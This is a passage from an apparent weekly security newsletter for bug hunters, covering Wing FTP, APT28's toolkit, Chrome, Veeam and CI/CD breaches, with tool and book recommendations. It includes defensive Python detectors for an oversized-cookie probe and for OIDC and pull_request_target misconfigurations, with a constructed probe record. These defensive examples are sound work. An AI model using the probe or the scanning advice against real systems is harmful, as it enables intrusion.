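Added example, not Wing FTP or CISA tooling; the request/response records
are constructed, the ExampleFTP path is invented, and the 64-character
threshold is an assumption to tune against your own baseline of UID values."""
import re

MAX_UID_LEN = 64  # assumption: legitimate session ids are far shorter than this

# A leaked installation path in a response body: Windows drive path or an
# absolute Unix path under a typical install prefix.
PATH_LEAK = re.compile(r"[A-Za-z]:\\[^\s\"']+|/(opt|usr|srv|home)/[^\s\"']+")


def uid_from_cookie_header(header):
    """Return the UID cookie value, or None if the header carries no UID."""
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep and name.strip() == "UID":
            return value.strip()
    return None


def inspect(record):
    """Findings for one record: {'src', 'cookie', 'status', 'body'}."""
    findings = []
    uid = uid_from_cookie_header(record.get("cookie", ""))
    if uid is not None and len(uid) > MAX_UID_LEN:
        findings.append(f"oversized UID cookie ({len(uid)} chars) from {record['src']}")
    # The disclosure is in the *error* path, so only error responses are
    # checked; a path in a normal directory listing is expected content.
    if record.get("status", 0) >= 400:
        leak = PATH_LEAK.search(record.get("body", ""))
        if leak:
            findings.append(f"error response to {record['src']} leaks path {leak.group(0)!r}")
    return findings


def scan(records):
    return [f for r in records for f in inspect(r)]


# Constructed records (TEST-NET source addresses).  The first is the probe
# and the leaking response; the others are ordinary traffic.
SAMPLE_RECORDS = [
    {"src": "198.51.100.23", "cookie": "UID=" + "A" * 300 + "; lang=en", "status": 500,
     "body": "error: cannot open session file C:\\Program Files\\ExampleFTP\\session\\"},
    {"src": "203.0.113.9", "cookie": "UID=3f9c1a2b7e; lang=en", "status": 200, "body": "<html>ok</html>"},
    {"src": "198.51.100.77", "cookie": "lang=en", "status": 404, "body": "not found"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(finding)
```

Both findings on the same source address within a short window are the signal worth alerting on: the oversized cookie alone is noisy on a busy server, but a 5xx whose body contains a filesystem path is exactly the disclosure this KEV entry describes, and it should not appear in production traffic at all once v7.4.4 or later is deployed.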

Source: BleepingComputer — CISA Flags Wing FTP Server Flaw, March 16, 2026

⚡ Bonus: APT28 Deploys BEARDSHELL + COVENANT Toolkit Against Ukraine

Russia's APT28 (Forest Blizzard / STRONTIUM / Fancy Bear) surfaced this week with a bespoke two-implant toolkit targeting Ukrainian cyber assets. The campaign uses BEARDSHELL — a malware family that borrows techniques from APT28's own tooling circa the 2010s — alongside a heavily modified version of the COVENANT C2 framework originally developed for legitimate red team use.

COVENANT provides APT28 with long-term persistence, lateral movement, PowerShell execution, and data exfiltration. A third component, SLIMAGENT, shares code overlaps with XAgent — APT28's long-running espionage implant tied to the 2016 DNC breach and numerous other campaigns over a decade of operations.

For bug hunters and defenders: The reuse of COVENANT (a legitimate red team framework) as a nation-state C2 platform creates a detection challenge. Defenders who have COVENANT YARA or network signatures tuned to detect red team engagements may correctly flag C2 traffic — but now they need to distinguish authorised red team exercises from APT28 intrusions. Review your C2 framework detection logic and ensure it correlates with authorised engagement calendars. Any COVENANT/Cobalt Strike/Sliver traffic outside scheduled assessments warrants immediate investigation.

Source: The Hacker News — APT28 Uses BEARDSHELL and COVENANT, March 14, 2026

🛠️ Essential Tools This Week

This week's findings span browser security, backup infrastructure exploitation, CI/CD and cloud access control testing, and macOS threat research. Here are five tools that map directly to what we covered:

1. Burp Suite Professional — Web, API & Cloud App Proxy

Why it's relevant this week: The Veeam REST API vulnerabilities, Wing FTP Server's UID cookie chain, and Chrome zero-day PoC development all require a capable HTTP intercepting proxy with active scanning and scripting support. Burp Suite Pro's Collaborator server is the gold standard for out-of-band injection detection — essential for confirming blind RCE and SSRF in enterprise products like Veeam. The active scanner's custom insertion point support lets you test specific parameters (like Veeam's Backup Viewer API paths) systematically. The Intruder tool is indispensable for cookie value fuzzing (like the Wing FTP UID cookie disclosure).

Available directly from PortSwigger at $449/year — the single highest-ROI investment in your bug hunting toolkit.

Burp Suite Professional → PortSwigger (official) — $449/year

2. Flipper Zero — Multi-Protocol Embedded Security Testing Device

Why it's relevant this week: Router security — highlighted by the SocksEscort/KadNap botnet stories — is fundamentally about hardware and embedded systems. The Flipper Zero covers the protocol stack that matters for SOHO device research: Sub-1 GHz radio for proprietary device protocols, RFID/NFC for access control testing, infrared for device control interfaces, and the Bad USB / GPIO interfaces for hardware debugging. When AVrecon flashes custom firmware to defeat OEM updates, understanding how embedded firmware works (and fails) at the hardware level is essential. The Flipper's open-source firmware and active plugin ecosystem make it the best entry-level hardware hacking tool available.

Flipper Zero on Amazon — ~$170–190

3. Alfa AWUS036ACHM — 802.11ac USB WiFi Adapter for Kali Linux

Why it's relevant this week: Router botnets infect devices via wireless protocols as well as internet-facing services. Research into SOHO router vulnerabilities requires a WiFi adapter with reliable monitor mode and packet injection support — the Alfa AWUS036ACHM delivers both on Linux with no driver hackery required. It's the most recommended adapter in the Kali Linux ecosystem for wireless security testing, supporting 802.11ac with 2.4 GHz and 5 GHz band coverage. Essential for WPA2/3 testing, handshake capture, deauth testing, and wireless protocol fuzzing alongside the router vulnerability research highlighted this week.

Alfa AWUS036ACHM on Amazon — ~$40–60

4. YubiKey 5C NFC — Hardware Security Key

Why it's relevant this week: MacSync targets browser-stored credentials and cookies. The UNC6426 attack chain started with a stolen GitHub PAT. Infostealers — both MacSync and QUIETVAULT — are specifically designed to harvest the credentials that protect your accounts and cloud access. Hardware security keys are the one credential type that can't be stolen by software infostealers: a FIDO2 YubiKey generates a unique cryptographic proof per site, bound to the device and the domain. Even if MacSync exfiltrates your password database, a hardware-bound FIDO2 token on GitHub, AWS, and your email provider makes those credentials useless to an attacker. The 5C NFC covers USB-C and NFC for seamless use across devices.

YubiKey 5C NFC on Amazon — ~$55–65

5. Raspberry Pi 5 (8GB) — Home Lab & Research Platform

Why it's relevant this week: Testing Veeam Backup & Replication vulnerabilities, replicating the KadNap router firmware persistence technique, and standing up isolated test environments for Chrome zero-day research all require compute. The Raspberry Pi 5 is a significant upgrade over Pi 4: 2–3× faster CPU performance, PCIe interface for NVMe SSD, and proper power delivery. It runs Kali Linux natively (ARM64), can host lightweight virtualisation via QEMU, and makes an excellent always-on research node. At ~$80 for the 8GB model, it remains the best cost-per-watt option for persistent security research labs.

Raspberry Pi 5 (8GB) on Amazon — ~$80–95

📚 Books to Go Deeper

This week's findings span browser internals, enterprise backup exploitation, cloud CI/CD security, and embedded device research. Four books to level up across those domains:

1. The Browser Hacker's Handbook

Why read it: Two Chrome zero-days in Skia and V8 this week make browser internals directly relevant. The Browser Hacker's Handbook covers the complete browser attack surface: JavaScript engine exploitation, sandbox escapes, extension abuse, and browser-based phishing techniques. It remains the most comprehensive reference for understanding how browser security mechanisms work and fail — essential context if you want to research Chrome VRP targets or understand what makes Skia OOB writes exploitable versus crash-only.

Buy on Amazon — ~$40–55

2. Hacking the Cloud: AWS, Azure, and GCP Security

Why read it: The UNC6426 AWS breach is a textbook cloud attack chain — supply chain compromise, token theft, OIDC abuse, CloudFormation privilege escalation, data destruction. Understanding each step requires cloud-specific knowledge that most traditional penetration testing books don't cover. This book addresses the full AWS/Azure/GCP attack and defence landscape: IAM privilege escalation, OIDC trust manipulation, S3 bucket exploitation, EC2 metadata abuse, and CI/CD pipeline attacks — exactly the techniques UNC6426 chained together this week.

Buy on Amazon — ~$45

3. The IoT Hacker's Handbook

Why read it: The SocksEscort/KadNap router botnet ecosystem, AVrecon's firmware-flashing persistence technique, and the broader SOHO device vulnerability landscape all point to embedded security as a high-value research area. The IoT Hacker's Handbook covers firmware extraction, binary analysis, UART/JTAG debugging, bootloader attacks, and wireless protocol testing in embedded systems — providing the methodology needed to research devices like the Asus routers targeted by KadNap. If you want to go beyond web applications into the hardware layer, this is the starting point.

Buy on Amazon — ~$40–50

4. Real-World Bug Hunting

Why read it: The Wing FTP Server story this week is a reminder that great bug bounty reports aren't just about finding bugs — they're about documenting chains, demonstrating impact, and communicating technical findings clearly. Real-World Bug Hunting covers the full lifecycle: reconnaissance, finding vulnerabilities, chaining issues, and writing compelling reports. The book's case studies draw from real HackerOne disclosures and teach the difference between a finding that gets triaged as informational and one that gets paid as critical. For hunters who've found individual issues but struggle to get high-severity payouts, the chaining and report quality lessons here are directly applicable.

Buy on Amazon — ~$35

🎯 Recommendations for Bug Hunters This Week

1. Patch Chrome Before Hunting Anything Else

Both CVE-2026-3909 and CVE-2026-3910 have active exploits. If your research machine isn't on Chrome 146.0.7680.75+, you're working from a browser with known, in-the-wild exploited vulnerabilities. Check chrome://settings/help and update immediately. This applies to any Chrome-based browser (Edge, Brave, Arc) — they all ship Skia and V8 and are similarly affected until updated.

2. Map Exposed Veeam Instances in Your Target Scope

Seven critical CVEs in a product with a documented history of rapid post-disclosure exploitation means there will be vulnerable instances in the wild within days. If any of your bug bounty targets run Veeam Backup & Replication and it's in scope, now is the time to check version numbers. The CVSS 9.9 findings requiring only authenticated domain user access are particularly tractable — if you have any internal user credentials through your reconnaissance process, Veeam RCE may be reachable.

3. Audit Your CI/CD for OIDC Trust Scope and Pwn Request Vectors

The UNC6426 breach is a wake-up call for supply chain and CI/CD security. If you do application-layer bug hunting, add these to your reconnaissance checklist: search target GitHub organisations for workflows using pull_request_target, check whether their GitHub-to-cloud OIDC trust scopes are wildcarded, and review what IAM permissions their Actions roles carry. Each of these is a reportable finding if misconfigured — and the UNC6426 case shows exactly what the impact looks like when all three fail simultaneously.
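A defender-side audit of the two misconfigurations named above (a wildcarded GitHub-to-AWS OIDC trust scope, and a pull_request_target workflow that checks out untrusted PR code), as an added example that is not from this post or any referenced project. The trust policies and workflow snippet are constructed samples; the account ID, org and repo names are placeholders.

```python
import json
import re
GH_OIDC = "token.actions.githubusercontent.com"

def audit_trust_policy(policy_json: str) -> list[str]:
    """Flag over-broad GitHub OIDC federation in an IAM role trust policy."""
    findings = []
    for stmt in json.loads(policy_json).get("Statement", []):
        principal = str(stmt.get("Principal", {}).get("Federated", ""))
        if stmt.get("Effect") != "Allow" or GH_OIDC not in principal:
            continue
        cond = stmt.get("Condition", {})
        keys: dict[str, list[str]] = {}
        for op in ("StringEquals", "StringLike"):  # flatten both operators into one map
            for k, v in cond.get(op, {}).items():
                keys.setdefault(k, []).extend(v if isinstance(v, list) else [v])
        if f"{GH_OIDC}:aud" not in keys:
            findings.append("missing aud condition")
        subs = keys.get(f"{GH_OIDC}:sub", [])
        if not subs:
            findings.append("missing sub condition: any GitHub repo can assume the role")
        for sub in subs:
            parts = sub.split(":")  # expected shape: repo:OWNER/REPO:ref:refs/heads/BRANCH
            if sub == "*" or (len(parts) > 1 and "*" in parts[1]):
                findings.append(f"wildcard repository in sub {sub!r}")
            elif sub.endswith(":*"):
                findings.append(f"sub {sub!r} not pinned to a branch, tag or environment")
    return findings

def audit_workflow(workflow_yaml: str) -> list[str]:
    """Flag the 'pwn request' pattern: pull_request_target plus checkout of the PR head."""
    findings = []
    if re.search(r"\bpull_request_target\b", workflow_yaml):
        findings.append("workflow runs on pull_request_target (privileged context for fork PRs)")
        if re.search(r"github\.event\.pull_request\.head\.(sha|ref)", workflow_yaml):
            findings.append("checks out untrusted PR head code under pull_request_target")
    return findings

# Constructed samples (not from the page): a weak and a strict trust policy, and a risky workflow.
def _policy(sub: str, aud: bool = True) -> str:
    cond = {"StringLike": {f"{GH_OIDC}:sub": sub}}
    if aud:
        cond["StringEquals"] = {f"{GH_OIDC}:aud": "sts.amazonaws.com"}
    return json.dumps({"Version": "2012-10-17", "Statement": [{
        "Effect": "Allow", "Action": "sts:AssumeRoleWithWebIdentity",
        "Principal": {"Federated": f"arn:aws:iam::123456789012:oidc-provider/{GH_OIDC}"},
        "Condition": cond}]})
WEAK_POLICY = _policy("repo:example-org/*", aud=False)
STRICT_POLICY = _policy("repo:example-org/app:ref:refs/heads/main")
RISKY_WORKFLOW = "on:\n  pull_request_target:\nsteps:\n  - uses: actions/checkout@v4\n    with:\n      ref: ${{ github.event.pull_request.head.sha }}\n"
```

Run `audit_trust_policy` against each role's `AssumeRolePolicyDocument` and `audit_workflow` against every file under `.github/workflows/`; an empty list means neither misconfiguration is present.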

4. Research FTP and File Transfer Software

Wing FTP Server is a reminder that legacy file transfer software is an underserved research area. Serv-U, FileZilla Server, JSCAPE MFT, and similar products are widely deployed in enterprise environments, often internet-facing, frequently under-patched, and underrepresented in bug bounty research. If you're looking for a high-value, low-competition research niche, enterprise file transfer software deserves a serious look.

5. Add macOS to Your Threat Model (Especially for OpSec)

ClickFix expanding to macOS via MacSync means security researchers operating on macOS are now explicitly targeted. Review what's installed on your research machines, audit Terminal command history for any unexpected entries, check your browser's saved credentials, and verify that your cryptocurrency wallet files haven't been accessed. Enable full-disk encryption, deploy an endpoint security product, and treat macOS with the same paranoia you'd apply to a Windows machine in a hostile environment.

Conclusion: Attack Chains Are Getting Longer and Quieter

The week of March 9–16 demonstrates a recurring theme in 2026 security: the most impactful compromises aren't the loudest ones. The UNC6426 breach started eight months before anyone noticed. Wing FTP Server's chain worked quietly for the better part of a year. The MacSync campaigns have been running since November 2025.

For bug hunters, this creates a counterintuitive lesson: the most valuable findings are often the ones that work slowly. A supply chain vector that silently harvests tokens for months before anyone uses them. An information disclosure bug that enables a critical RCE chain only when combined with another finding. An OIDC trust misconfiguration that's harmless until someone's token gets stolen.

These aren't the showstopper CVSSv3 10.0 findings that make headlines. They're the quiet, combinable issues that define real-world breach paths. And they're the findings that most automated scanners and AI-powered tools miss entirely — because they require understanding context, relationships, and what an attacker does after initial access.

The Chrome zero-days are urgent and important. Patch Veeam before ransomware groups weaponise the PoC. But the longer-term opportunity for researchers in 2026 is in finding these multi-stage, slow-burn attack paths — and that requires the kind of patient, contextual analysis that can't be automated.

Stay sharp, stay curious, and happy hunting.
